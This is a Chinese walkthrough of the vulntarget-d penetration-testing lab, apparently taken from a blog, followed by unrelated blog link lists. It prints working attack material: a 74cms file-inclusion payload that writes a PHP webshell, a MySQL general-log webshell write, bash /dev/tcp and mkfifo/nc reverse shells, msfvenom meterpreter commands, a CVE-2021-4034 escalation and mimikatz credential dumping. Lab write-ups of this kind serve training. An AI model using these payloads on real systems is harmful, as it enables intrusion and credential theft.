vulntarget-d

配置信息

系统 ip
kali 192.168.130.5
ubuntu 18 ip1: 192.168.130.8 ip2: 10.0.10.1
win7 10.0.10.134

网卡修改

ubuntu如果配置上双网卡没显示就如下操作:

// 修改配置文件

sudo vim /etc/network/interfaces

// 之后重启网络

sudo /etc/init.d/networking restart

文件内如下,也可以改成了静态的ip,这个随意。

最后用列出所有网卡查看修改的情况, 网卡配置完成。

实战

web打点

信息收集

发现了3306的MySQL有未授权,然后8888有个登录。

用fscan扫一下,发现8888那有个登录入口一眼宝塔, 81有个骑士cms。

在网页底部找到他的版本信息v6.0.20就可以去搜索历史漏洞。

骑士cms文件包含

去网上搜了利用的文章,先用post写入一句话。

variable=1&tpl=<?php fputs(fopen("110.php","w"),"<?php eval(\$_POST[110]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

然后开始包含日志文件,日志文件要和当天的日期一致。

variable=1&tpl=data/Runtime/Logs/Home/23_08_21.log

这里有个点,当写的文件名是shell.php的时候会被宝塔给拦截了但是去Ubuntu里面看确实是写入了,这里直接换个文件名就ok的。

内网渗透

Ubuntu提权

连上哥斯拉上来丝滑三连发现第二个网段,转战msf进行提权。

本来想偷懒直接用哥斯拉反弹过去的,但是效果不好一下就会断掉。

老老实实传msf上去。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.130.5 LPORT=6666 -f elf > 110.elf

handler -p linux/x86/meterpreter/reverse_tcp -H 192.168.130.5 -P 6666

下载提权脚本来看看入手点,但是很奇怪赋权之后执行了报错。先在msf这里挂个提权模块待会等结果。

run post/multi/recon/local_exploit_suggester

在哥斯拉里面试了一下发现了报错,出现这个原因一般是函数被ban了。

按前面的步骤写一个phpinfo(),可以看到被ban的还挺多的。

看了一下它上面有vim,然后也找到了php.ini可以试着改一手,先反弹shell过去。

bash -i >& /dev/tcp/192.168.130.5/9999 0>&1

有python环境升级交互式shell,定位到php.ini。

但是是真离谱进不了命令行模式进行移动,esc, Ctrl + [, Ctrl+o都不行,Ctrl+c就直接断了。

完全交互式shell

搜到一个升级到完全交互式shell的方法,先用这种方式反弹shell。然后还是正常的升级交互式shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.105 6667 >/tmp/f

python3 -c 'import pty;pty.spawn("/bin/bash")';

接着设置环境变量, Ctrl+z将shell发送到后台, 设置 shell 以通过反向 shell 发送控制字符和其他原始输入。使用以下stty命令来执行此操作。之后再输入reset。

export TERM=xterm    // 允许clear

Ctrl + z

stty raw -echo;fg

reset

然后此时就可以正常进入普通模式和命令模式,找到disable_functions的地方。

我真的服辣我是**。

回过头去看了一下msf的结果,有个cve-2021-4034

找到一个exp提权成功,exp传送门 GayHub - 全球最大 同性交友网站

流量转发

再运行之前的子上线msf,再创建路由入段(没找到chisel就寄希望于msf的socks试试)。

run autoroute -s 10.0.10.0/24

run autoroute -p

不成不成,太容易断了最后还是挂上frp,但是配置proxychains让fscan开扫扫不到一个?但是使用他内置的flag可以正常扫到。

这里可以看到除开本机和10.0.10.3, 就是10.0.10.2存活。

根据结果得知10.0.10.2是Win7,其他指纹信息没有什么有用的。

root@kali ~/Desktop » ./fscan_amd64 -h 10.0.10.1-128 -socks5 192.168.130.5:1515     

   ___                              _

  / _ \     ___  ___ _ __ __ _  ___| | __

 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /

/ /_\\_____\__ \ (__| | | (_| | (__|   <

\____/     |___/\___|_|  \__,_|\___|_|\_\

                     fscan version: 1.8.2

Socks5Proxy: socks5://192.168.130.5:1515

start infoscan

10.0.10.2:80 open

10.0.10.3:80 open

10.0.10.3:81 open

10.0.10.2:135 open

10.0.10.1:135 open

10.0.10.2:139 open

10.0.10.2:445 open

10.0.10.2:3306 open

10.0.10.3:3306 open

10.0.10.3:8080 open

10.0.10.3:888 open

10.0.10.3:1080 open

10.0.10.1:8082 open

10.0.10.3:8888 open

[*] alive ports len is: 14

start vulscan

[*] WebTitle: http://10.0.10.3          code:200 len:1326   title:没有找到站点

[*] NetInfo:

[*]10.0.10.1

   [->]Lockly

   [->]172.31.224.1

   [->]192.168.130.1

   [->]10.0.10.1

   [->]192.168.43.233

   [->]240e:468:f2f3:21c0:32c5:5ebe:ccd1:1d9

   [->]240e:468:f2f3:21c0:c9f6:cb76:c5d6:839d

[*] WebTitle: http://10.0.10.2          code:200 len:11     title:None

[*] WebTitle: http://10.0.10.3:8080     code:404 len:9      title:None

[*] 10.0.10.2  (Windows 7 Ultimate 7601 Service Pack 1)

[*] WebTitle: http://10.0.10.3:888      code:404 len:548    title:404 Not Found

[*] WebTitle: http://10.0.10.3:81       code:200 len:127210 title:骑士PHP高端人才系统(www.74cms.com)

[*] WebTitle: http://10.0.10.3:8888     code:302 len:219    title:Redirecting... 跳转url: http://10.0.10.3:8888/login

[*] NetInfo:

[*]10.0.10.2

   [->]WIN-D4S86JO2R26

   [->]10.0.10.2

[*] WebTitle: http://10.0.10.1:8082     code:400 len:18     title:None

已完成 14/14

[*] 扫描结束,耗时: 4m45.627909432s

这里奇怪的就是proxychains firefox是能正常访问到10.0.10.2他的站点的,但是挂给工具扫就是没用

真是鬼来了dirb和dirsearch走proxychains又是正常的,nmap,fscan一概扫不到。dirb结果有一个php探针和phpmyadin的登录页面。

除开这两个然后在dirb中还有一个l.php。

这个l.php是个php探针,底下连接数据库那里弱口令root:root一尝试就出来了。

全局日志写入一句话

查看全局日志是否开启,这里的原始位置可以留个记录,后续写完之后复原日志善始善终,但是这里显示有点问题我就没负责了。

SHOW GLOBAL VARIABLES LIKE '%general%';

开启全局日志,之后查看一下确认开了就OK。

SET GLOBAL GENERAL_LOG=ON;

SET GLOBAL GENERAL_LOG_FILE = 'C:/phpstudy/PHPTutorial/www/t.php';

将子写入日志。

select '<?php eval($_POST["hi"]);?>'

可以访问到t.php,连接上就没问题。

免杀上线

发现里面有火绒,要考虑做一下免杀。

免杀有时效性就没记录了,这台机器不出网,所以要用正向马。然后上传免杀之后,开启监听拿到了会话。

handler -p windows/meterpreter/bind_tcp -H 10.0.10.2 -P 4444

后续的图忘了截了,将进程迁移到64位上。用mimikatz抓密码,3389上才艺上去一眼就能看到flag。

vulntarget-d-wp的更多相关文章

  1. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

  2. wp已死,metro是罪魁祸首!

    1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...

  3. 关于 WP 开发中.xaml 与.xaml.cs 的关系

    今天我们先来看一下在WP8.1开发中最长见到的几个文件之间的关系.比较论证,在看这个问题之前我们简单看看.NET平台其他两个不同的框架: Windows Forms 先看看Window Forms中的 ...

  4. Android,ios,WP三大手机系统对比

    从前,我以为.一个手机系统只是一个系统的UI风格,没什么不同的.然而,在我混合使用这三个手机系统之后,才明白,一个手机系统远不只一个UI那么简单,而真的是可以称之为一个“生态”. 首先祭出三台经典设备 ...

  5. 搜狗输入法wp风格皮肤

    换了个nexus 发现输入法真的没有wp的好用 没办法,刚好搜狗输入法有定制皮肤的选项,所以自己做了个wp风格的输入法皮肤. 一点微小的工作 http://pan.baidu.com/s/1kVsHd ...

  6. 免费获取WP之类的开发者权限或免费使用Azure 2015-10-19

    上一次弄wp真机调试的时候,卡住了,这里讲一下怎么解决(http://www.cnblogs.com/dunitian/p/4870959.html) 进这个网址注册一下:https://www.dr ...

  7. 【WP开发】读写剪贴板

    在WP 8.1中只有Silverlight App支持操作剪贴板的API,Runtime App并不支持.不过,在WP 10中也引入了可以操作剪贴板的API. 顺便说点题外话,有人会说,我8.1的开发 ...

  8. 【WP开发】不同客户端之间传输加密数据

    在上一篇文章中,曾说好本次将提供一个客户端之间传输加密数据的例子.前些天就打算写了,只是因一些人类科技无法预知的事情发生,故拖到今天. 本示例没什么技术含量,也没什么亮点,Bug林立,只不过提供给有需 ...

  9. 【WP开发】加密篇:双向加密

    说起双向加密,如果以前在.NET开发中弄过加/解密的朋友都不会陌生,常用的算法有DES.AES等.在RT应用程序中,也提供了加密相关的API,算法自然是一样的,只是API的封装方式不同罢了,因为RT不 ...

  10. 【WP 8.1开发】How to 图像处理

    在今天的吹牛节目开始之前,先交代一件事: 关于玩WP 8.1开发所使用的VS版本问题.对版本的要求是2013的Update2,这是最低要求,只要是这个版本或以上都可以,而update3,update4 ...

随机推荐

  1. 【解惑】孜孜不倦,用足球赛程详解c#中的yield return用法

    在一个知名企业赞助的足球联赛中,有256支球队参赛.为了确保比赛的顺利进行,企业指派了小悦负责熬夜加班制定每一个球队的赛程.尽管她对足球的了解并不多,但是她对待工作的认真态度却让人钦佩. 在小悦的努力 ...

  2. 异常:no transaction is in progress

    转载请注明出处: 在使用  @Scheduled 注解创建了一个定时任务,并通过定时任务不断向mysql写入数据,写入数据的方式是通过 jpa 的方式,在代码运行的过程中出现错误:no transac ...

  3. code2uml使用教程

    通常的开发顺序是 先设计uml然后进行code编程. 但是很多时候我们是先看到code源码,却不知道uml关系如何. 特别是写论文的时候也是很需要的. 这个code2uml,就是辛苦搜寻到的结果,可以 ...

  4. 小景的Dba之路--Oracle用exp导出dmp文件很慢

    小景最近在系统压测相关的工作,其中涉及了Oracle数据库相关的知识,之前考的OCP证书也在此地起了作用.今天的问题是:Oracle用exp导出dmp文件很慢,究竟是什么原因,具体的解决方案都有哪些呢 ...

  5. 挑战程序设计竞赛 2.2 poj 3040 Allowance 贪心

    https://vjudge.csgrandeur.cn/problem/POJ-3040 /* 作为创纪录的牛奶产量的奖励,约翰决定每周给贝西一小笔零用钱.FJ拥有一组N(1 <= N < ...

  6. FHQ_Treap学习笔记

    前置芝士(了解即可啦~):C++.BST 二叉搜索树.堆.二叉堆 Treap 的概念 Treap 树堆,即树(Tree)+堆(Heap),是一棵弱平衡的二叉搜索树(BST),能同时满足二叉搜索树与堆的 ...

  7. 2022 暑期 DP 极限单兵计划

    前言 LJ 认为我的 DP 是我的一大弱项,便精心为我准备了 毒瘤DP 12 题(然后发现原来给的 T1 是个树套树,就变成 毒瘤DP 11 题 感谢 LJ 教练..... 为了方便复习,代码均格式化 ...

  8. 洛谷P2757 [国家集训队]等差子序列 (hash+线段树)

    题目连接 这题只要令 $len=3$看是否符合即可.因为是一个 $1$到 $n$的排列,考虑数列中项,那么对于一个数 $x$,令 $k=\max(n-x, x-1)$,只要存在 $d\in(1,k)$ ...

  9. dev-c++ 使用教程

    Dev C++ 支持单个源文件的编译,如果你的程序只有一个源文件(初学者基本都是在单个源文件下编写代码),那么不用创建项目,直接运行就可以:如果有多个源文件,才需要创建项目. 一.新建源文件 1.通过 ...

  10. 从ClickHouse通往MySQL的几条道路

    一.应用背景简介 ClickHouse 是 Yandex(俄罗斯最大的搜索引擎)开源的一个用于实时数据分析的基于列存储的数据库,其处理数据的速度比传统方法快 100-1000 倍.ClickHouse ...